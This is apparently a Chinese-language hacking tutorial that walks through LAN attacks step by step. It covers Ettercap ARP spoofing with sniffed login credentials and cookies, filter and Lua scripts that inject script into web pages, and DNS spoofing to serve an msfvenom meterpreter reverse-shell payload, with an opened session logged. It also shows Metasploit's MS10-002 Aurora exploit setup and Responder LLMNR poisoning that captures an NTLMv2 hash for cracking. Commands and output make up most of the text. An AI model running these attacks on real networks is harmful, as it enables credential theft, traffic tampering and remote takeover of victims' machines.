Ettercap ARP欺骗,Evilgrade DNS欺骗,Metasploit Responder NetBIOS LLMNR欺骗
ARP欺骗:假扮网关,拦截任何要离开本地网络的流量.
DNS欺骗:DNS名称到IP转换创建一个不正确的响应.能够欺骗用户从攻击者服务器获取恶意数据和用户访问恶意站点.
Ettercap ARP欺骗局域网中的windows7:
ettercap 支持解析多种协议类型
官方:http://www.ettercap-project.org/
gitHub : https://github.com/Ettercap/ettercap
# -T 启用文本模式 -q 静默运行 -M arp:remote 进行ARP欺骗 参数一:网关IP 参数二:目标IP "空格键" 取消静默模式 在按一下启动静默模式
~# ettercap -T -q -M arp:remote /192.168.2.1// /192.168.2.110//
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
Scanning for merged targets (2 hosts)...
* |==================================================>| 100.00 %
Packet visualization restarted...
#空格打开 可以看到流量
TCP 192.168.2.110:50075 --> 125.39.174.72:80 | AP (1248)
POST /member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1 HTTP/1.1.
Host: mcar.cc.
Connection: keep-alive.
Content-Length: 83.
Cache-Control: max-age=0.
Origin: http://mcar.cc.
Upgrade-Insecure-Requests: 1.
Content-Type: application/x-www-form-urlencoded.
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36.
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8.
Referer: http://mcar.cc/forum.php?mod=forumdisplay&fid=129&filter=lastpost&orderby=lastpost.
Accept-Encoding: gzip, deflate.
Accept-Language: zh-CN,zh;q=0.9.
Cookie: __cfduid=d23867c9e4dfa44b774d10fc8d1f098ef1535437947; BRFN_2132_saltkey=DbYGPgqu; BRFN_2132_lastvisit=1535434325; BRFN_2132_st_t=0%7C1535437925%7Cd2135a73018d87aa490392bfc6cc6858; BRFN_2132_forum_lastvisit=D_129_1535437925; BRFN_2132_visitedfid=129; BRFN_2132_sendmail=1; Hm_lvt_0b784c51f644f59deba6e333b56c5c72=1535437951; Hm_lpvt_0b784c51f644f59deba6e333b56c5c72=1535437951; yjs_id=e07ffa8d5d54a6fdbd1cef9fceccd890; ctrl_time=1; BRFN_2132_lastact=1535437999%09member.php%09logging.
.
fastloginfield=username&username=admin&password=admin&quickforward=yes&handlekey=lsHTTP : 125.39.174.72:80 -> USER: admin PASS: admin INFO: http://mcar.cc/forum.php?mod=forumdisplay&fid=129&filter=lastpost&orderby=lastpost
CONTENT: fastloginfield=username&username=admin&password=admin&quickforward=yes&handlekey=ls
#上面能看到流量中显示的用户名密码
#ettercap -m ettercap.log -w ettercap.pcap -T -q -M arp:remote /192.168.2.1// /192.168.2.110// -m可以加入日志文本 -w可以保存数据流量回放查看 更多参数设置可用-h查看 Ettercap操纵网络流量:
第一种是使用Etterfilter框架,框架用于注入BeEF添加恶意代码降级https.
第二种是使用强大的Lua脚本语言操纵数据.
#test.filter
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
pcre_regex(DATA.data, "(Accept-Encoding:).*([\r\n])", "$1 identity$2");
msg("=");
}
}
if (ip.proto == TCP && tcp.src == 80) {
if (pcre_regex(DATA.data, "<\/head>")) {
pcre_regex(DATA.data, "<\/head>","<script>alert('hello')</script>$1");
msg("+");
}
}编译脚本 errterfilter -o test.ef test.filter
执行:~# ettercap -T -q -M arp:remote -F test.ef /192.168.2.1// /192.168.2.110// #可以写绝对路径
访问站点 可以看到注入的内容
Packet visualization stopped...
=
=
JIT FILTER FAULT: Too many marker for this pcre expression
+
=
=
=
JIT FILTER FAULT: Too many marker for this pcre expression
+
=
=
=
=
判断数据包是否是TCP数据包端口80,search函数会判断是否包含Accept-Encoding如果为true 就修改头部.不进行解压包,msg提示是否执行了.注入脚本找头script进行弹窗.
Lua脚本:
etterpcap -T -q -M arp:remote --lua-script=test.lua /192.168.2.1// /192.168.2.110
description = "Injection Script using Lua"
local hooks = require("hook_points")
local packet = require("packet")
inject = "<script>alert('hello')</script>"
hook_point = hooks.filter
packetrule = function(packet_object)
return(packet_object:is_tcp() and
packet_object:has_data() and
(packet_object:dst_port() == 80 or
packet_object:src_port() == 80))
end
action = function(packet_object)
p = packet_object
data = p:read_data()
if string.find(data, "Accept.Encoding:") then
s,e = string.find(data, 'Accept.Encoding:.-\n')
newdata = string.gsub(data, "Accept.Encoding:.-\n",
"Accept-Encoding: identity" .. string.rep(" ", e - s - 27) .. "\r\n")
packet.set_data(p, newdata)
ettercap.log("Downgraded Encoding")
return
end
body = string.upper(data)
if (string.find(body,'<HEAD>')) then
s,e = string.find(body, '<TITLE>.-</TITLE>')
if s then
title = string.sub(data,s,e)
s,e = string.find(body, "<HEAD>.-</HEAD>")
if not s or not e then
return
end
len = e-s
idata = "<head>" .. title .. inject .. "</head>"
newstr = string.sub(data, 0, s - 1) .. idata .. string.rep(" ", len - string.len(idata)) .. string.sub(data,e+1,-1)
ettercap.log("Updating string")
packet.set_data(p, newstr)
end
end
endDNS欺骗:
第一种NDS缓存投毒,利用DNS缓存注入新的NDS名称记录.
第二种ARP投毒,欺骗后响应DNS请求.但是必须要和目标机器在同一子网中.
Ettercap NDS欺骗:
让目标去下载一个恶意程序 生成一个木马 放到apache2 /var/www/html/ 启动apache2
这生产的exe文件需要站点跳转下载 生成一个php木马和其他web页面更佳
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.2.109 LPORT=4444 -f exe > test.exe修改/etc/ettercap/etter.dns 对https 需要降级为http才能有效
当对方打开网页访问站点 解析的时候就会解析到 指定的站点
################################
# microsoft sucks ;)
# redirect it to www.linux.org
#也可以指定域名
* A 192.168.2.109
* PTR 192.168.2.109
##########################################启动ettercap
ettercap -T -q -M arp:remote -P dns_spoof /192.168.2.1// /192.168.2.110//
可生成各种想要的木马挂到站点
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.2.109:4444
[*] Sending stage (206403 bytes) to 192.168.2.110
[*] Meterpreter session 2 opened (192.168.2.109:4444 -> 192.168.2.110:51046) at 2018-08-29 13:57:44 +0800
meterpreter >
evilgrade工具:https://tools.kali.org/sniffingspoofing/isr-evilgrade
注入虚假更新,有很多模块供使用, 安装apt-get install isr-evilgrade
查看流量目标机器发起的GET请求 Host地址 XXX.XXX A LHOST,这种方式太过局限性.加入木马.exe文件是非常好的组合.
使用IE浏览器的极光漏洞MS10-002:
msf > db_status
[*] postgresql connected to msf
msf > search ms10_002
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/browser/ms10_002_aurora 2010-01-14 normal MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
exploit/windows/browser/ms10_002_ie_object 2010-01-21 normal MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(windows/browser/ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/browser/ms10_002_aurora) > show options
msf exploit(windows/browser/ms10_002_aurora) > set LHOST 192.168.2.109
LHOST => 192.168.2.109
msf exploit(windows/browser/ms10_002_aurora) > set LPORT 443
LPORT => 443
msf exploit(windows/browser/ms10_002_aurora) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.2.109:443
msf exploit(windows/browser/ms10_002_aurora) > [*] Using URL: http://0.0.0.0:8080/wMg2vf
[*] Local IP: http://192.168.2.109:8080/wMg2vf
[*] Server started.
msf exploit(windows/browser/ms10_002_aurora) >
并没有成功!!! 可以使用SET和BeFF试试
NetBIOS欺骗和LLMNR欺骗:
NetBIOS和LLMNR是Microsoft针对工作组和域设计的名称解析协议.DNS解析失败后会使用NetBIOS和LLMNR搜索名称.
NetBIOS基于广播,LLMNR基于多播,LLMNR支持IPv6 前者不支持.
使用Responder攻击: GitHub:https://github.com/lgandx/Responder
启动:
responder -I wlan0 -rPv
在windows中打开浏览器 输入一个不存在的地址比如\\fuck 等等 会看到发送过来的请求
[*] [LLMNR] Poisoned answer sent to 192.168.2.110 for name fuck
[*] [LLMNR] Poisoned answer sent to 192.168.2.110 for name fuck
[SMBv2] NTLMv2-SSP Client : 192.168.2.110
[SMBv2] NTLMv2-SSP Username : ADMIN\Administrator
[SMBv2] NTLMv2-SSP Hash : Administrator::ADMIN:955d0626db69b114:F77CDA7D495A387F90A4E247E798E7B4:0101000000000000C0653150DE09D201D97F643AF37AEE90000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000300000923364546A1ABC82F5A7B2556F6C5A898C42F7B5EE9D8406136C706E5C55BBE60A001000000000000000000000000000000000000900120063006900660073002F006600750063006B00000000000000000000000000
/usr/share/responder/logs/ 这在个目录下会看到 抓到的凭据 多跑几分钟才能获得更多的凭据
然后就可以使用 john 破解NTLMv2哈希了